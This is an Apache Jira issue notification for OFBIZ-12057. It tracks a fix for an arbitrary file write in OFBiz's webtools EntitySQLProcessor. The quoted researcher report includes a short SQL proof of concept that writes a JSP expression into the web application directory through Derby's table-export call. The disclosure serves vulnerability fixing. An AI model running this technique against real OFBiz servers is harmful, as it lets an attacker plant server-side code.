Jacques Le Roux created OFBIZ-12057: ---------------------------------------
Summary: Prevent arbitary file write using webtools/control/EntitySQLProcessor. Key: OFBIZ-12057 URL: https://issues.apache.org/jira/browse/OFBIZ-12057 Project: OFBiz Issue Type: Sub-task Components: framework/webtools Affects Versions: Trunk Reporter: Jacques Le Roux Assignee: Jacques Le Roux Shuibo Ye <shuib...@gmail.com> reported a possible arbitary file write using webtools/control/EntitySQLProcessor. {quote} In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*. PoC: CREATE TABLE "test" (string VARCHAR(80)) INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>') call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null) After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp. {quote} -- This message was sent by Atlassian Jira (v8.3.4#803005)